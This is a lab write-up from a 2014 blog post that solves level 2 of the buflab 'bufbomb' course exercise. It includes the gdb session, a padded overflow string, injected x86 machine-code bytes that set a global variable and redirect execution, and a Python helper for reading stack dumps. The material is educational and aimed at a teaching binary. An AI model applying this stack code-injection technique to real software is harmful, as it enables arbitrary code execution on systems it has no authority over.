Sunday, January 12, 2014

Bufbomb phase 2


Levels 0 and 1 are covered in earlier posts on this blog; please check them out first if you have no idea what I am trying to do here.
Level 2: Firecracker
A much more sophisticated form of buffer attack involves supplying a string that encodes actual machine instructions. The exploit string then overwrites the return pointer with the starting address of these instructions on the stack. When the calling function (in this case getbuf) executes its ret instruction, the program will start executing the instructions on the stack rather than returning. With this form of attack, you can get the program to do almost anything. The code you place on the stack is called the exploit code. This style of attack is tricky, though, because you must get machine code onto the stack and set the return pointer to the start of this code.
To start with, what you need to know is:
1. your cookie number (you should already have it from levels 0 and 1)
2. your exploit address: the stack address that will replace the saved return address, i.e. where your exploit code sits
3. the address of global_value: it is initialised to 0, so your exploit code has to write your cookie to this address
So, to start: the idea is similar to phases 0 and 1.
Within the file bufbomb there is a function bang having the following C code:
int global_value = 0;
void bang(int val)
{
    if (global_value == cookie) {
        printf("Bang!: You set global_value to 0x%x\n", global_value);
        validate(2);
    } else
        printf("Misfire: global_value = 0x%x\n", global_value);
    exit(0);
}
First, write your exploit string into a file, bang.txt:

[plueonde@bert buflab-handout]$ vim bang.txt
In vim you can use any byte value as filler to keep track of your string. I personally use 61 (the letter a) 36 times, then add 30 four times, for a total of 40 bytes, to generate my overflow.
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 30 30 30 30
Save and quit vim, then translate the hex into a raw string with hex2raw, writing the output to bang-raw.txt. Once we have bang-raw.txt we run it under gdb to see the address where our overflow lands.
[plueonde@bert buflab-handout]$ ./hex2raw < bang.txt > bang-raw.txt
[plueonde@bert buflab-handout]$ gdb bufbomb
GNU gdb (GDB) Red Hat Enterprise Linux (7.0.1-45.el5)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb...(no debugging symbols found)...done.
(gdb) b *getbuf+17
Breakpoint 1 at 0x8049093
(gdb) r -u plueon2 < bang-raw.txt
Starting program: /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb -u plueon2 < bang-raw.txt
Userid: plueon2
Cookie: 0x34fd7256
Breakpoint 1, 0x08049093 in getbuf ()
(gdb) disas bang
Dump of assembler code for function bang:
0x08048c0b <bang+0>:    push   %ebp <= bang function address
0x08048c0c <bang+1>:    mov    %esp,%ebp
0x08048c0e <bang+3>:    sub    $0x8,%esp
0x08048c11 <bang+6>:    mov    0x804c1ec,%eax <= global_value address
0x08048c16 <bang+11>:    cmp    0x804c1e4,%eax
0x08048c1c <bang+17>:    jne    0x8048c3c <bang+49>
0x08048c1e <bang+19>:    mov    %eax,0x4(%esp)
0x08048c22 <bang+23>:    movl   $0x804a064,(%esp)
0x08048c29 <bang+30>:    call   0x8048870 <printf@plt>
0x08048c2e <bang+35>:    movl   $0x2,(%esp)
0x08048c35 <bang+42>:    call   0x80490a0 <validate>
0x08048c3a <bang+47>:    jmp    0x8048c4c <bang+65>
0x08048c3c <bang+49>:    mov    %eax,0x4(%esp)
0x08048c40 <bang+53>:    movl   $0x804a19f,(%esp)
0x08048c47 <bang+60>:    call   0x8048870 <printf@plt>
0x08048c4c <bang+65>:    movl   $0x0,(%esp)
0x08048c53 <bang+72>:    call   0x8048930 <exit@plt>
End of assembler dump.
(gdb) x/20wx $esp <= look at your $esp in 20 words
0x55682f88 <_reserved+1036168>:    0x55682f90    0x006cd736    0x61616161    0x61616161
0x55682f98 <_reserved+1036184>:    0x61616161    0x61616161    0x61616161    0x61616161
0x55682fa8 <_reserved+1036200>:    0x61616161    0x61616161    0x61616161    0x30303030: end
0x55682fb8 <_reserved+1036216>:    0x007f9f00    0x55686018    0x00000000    0x55682fe0
^^ overflow address (0x55682fb8, the word right after the 30 30 30 30 marker: this is where the exploit code will start)
0x55682fc8 <_reserved+1036232>:    0x006e7ce3    0x007fa4c0    0x0804a22e    0x55682fec
(gdb) quit
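Reading that stack dump by eye is error-prone, so here is an added example (my own code, not part of the lab or the original post) that parses the gdb x/20wx output shown above, measures how far the 0x61 filler runs before the first word that differs, and shows how a 32-bit stack address must be laid out byte by byte in little-endian order, which is why 0x55682fb8 ends up in the hex file as b8 2f 68 55. The dump is embedded as a string exactly as it appears in the session, annotations included; the function names are mine.

```python
import re

# The `x/20wx $esp` dump from the gdb session above, embedded verbatim
# (including the hand-written annotations) so this runs offline.
SAMPLE_DUMP = """\
0x55682f88 <_reserved+1036168>:    0x55682f90    0x006cd736    0x61616161    0x61616161
0x55682f98 <_reserved+1036184>:    0x61616161    0x61616161    0x61616161    0x61616161
0x55682fa8 <_reserved+1036200>:    0x61616161    0x61616161    0x61616161    0x30303030: end
0x55682fb8 <_reserved+1036216>:    0x007f9f00    0x55686018    0x00000000    0x55682fe0
^^overflow address
0x55682fc8 <_reserved+1036232>:    0x006e7ce3    0x007fa4c0    0x0804a22e    0x55682fec
"""

# One dump line: address, optional <symbol+offset>, a colon, then the words.
LINE_RE = re.compile(r"^(0x[0-9a-fA-F]+)\s*(?:<[^>]*>)?\s*:(.*)$")
WORD_RE = re.compile(r"0x[0-9a-fA-F]+")


def parse_gdb_words(dump, word_size=4):
    """Map address -> word for every word in a gdb `x/Nwx` dump.
    Lines that are not dump lines (annotations like '^^...') are skipped,
    and stray tokens after the words (': end') are ignored."""
    words = {}
    for line in dump.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        base = int(m.group(1), 16)
        for i, tok in enumerate(WORD_RE.findall(m.group(2))):
            words[base + i * word_size] = int(tok, 16)
    return words


def fill_run(words, fill_byte=0x61, word_size=4):
    """Find the contiguous run of words made entirely of `fill_byte`
    (the 'a' padding). Returns (start, length_in_bytes, first_other_addr),
    or None if the filler never appears."""
    fill_word = int.from_bytes(bytes([fill_byte]) * word_size, "little")
    start = next((a for a in sorted(words) if words[a] == fill_word), None)
    if start is None:
        return None
    end = start
    while words.get(end) == fill_word:
        end += word_size
    return start, end - start, end


def little_endian_hex(word, word_size=4):
    """Render a word as the space-separated bytes hex2raw expects for x86."""
    return " ".join(f"{b:02x}" for b in word.to_bytes(word_size, "little"))


def describe(dump):
    """Summarise where the filler ended and what address follows the marker."""
    words = parse_gdb_words(dump)
    start, length, marker = fill_run(words)
    after = marker + 4  # the word right after the 30 30 30 30 marker
    return {
        "buffer_start": start,
        "filler_bytes": length,          # offset from buffer start to the marker
        "marker_addr": marker,
        "marker_word": words[marker],
        "after_marker_addr": after,
        "after_marker_bytes": little_endian_hex(after),
    }


if __name__ == "__main__":
    info = describe(SAMPLE_DUMP)
    print(f"filler starts at 0x{info['buffer_start']:08x} and runs {info['filler_bytes']} bytes")
    print(f"marker 0x{info['marker_word']:08x} sits at 0x{info['marker_addr']:08x}")
    print(f"word after marker: 0x{info['after_marker_addr']:08x} -> {info['after_marker_bytes']}")
```

The filler run length (36 bytes here) is the distance from the start of the buffer to the slot that the 30 30 30 30 bytes landed in, which is why the string in this walkthrough is 36 a's followed by a 4-byte address. The parser only trusts tokens that look like hex words, so annotations pasted into the session do not corrupt the result.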
Quit gdb and now build your exploit file: replace 30 30 30 30 with the overflow address, written in little-endian byte order (0x55682fb8 becomes b8 2f 68 55).
[plueonde@bert buflab-handout]$ vim bang.txt
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61  b8 2f 68 55
Then write the exploit code in assembly.s:
[plueonde@bert buflab-handout]$ vim assembly.s
movl   $0x34fd7256,0x804c1ec    # store the cookie in global_value (0x804c1ec)
push   $0x08048c0b              # push the address of bang as the new return address
ret                             # "return" into bang
Save, quit, and assemble it:
[plueonde@bert buflab-handout]$ gcc -c assembly.s
[plueonde@bert buflab-handout]$ objdump -d assembly.o > assembly.d
[plueonde@bert buflab-handout]$ cat assembly.d
assembly.o:     file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0:    c7 04 25 ec c1 04 08     movl   $0x34fd7256,0x804c1ec
7:    56 72 fd 34
b:    68 0b 8c 04 08           pushq  $0x8048c0b
10:    c3                       retq
Copy the instruction bytes from the disassembly and append them to bang.txt. Note that gcc here assembles for x86-64 (objdump reports elf64-x86-64, and prints pushq/retq), but the byte encodings of these three instructions are the same in 32-bit mode, so the bytes can be used as-is in the 32-bit bufbomb.
[plueonde@bert buflab-handout]$ vim bang.txt
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61  b8 2f 68 55 c7 04 25 ec c1 04 08 56 72 fd 34 68 0b 8c 04 08 c3 
Save, quit, and try it out:
[plueonde@bert buflab-handout]$ ./hex2raw < bang.txt > bang-raw.txt
[plueonde@bert buflab-handout]$ ./bufbomb -u plueon2 < bang-raw.txt
Userid: plueon2
Cookie: 0x34fd7256
Type string:Bang!: You set global_value to 0x34fd7256
VALID
NICE JOB!
Congratulations!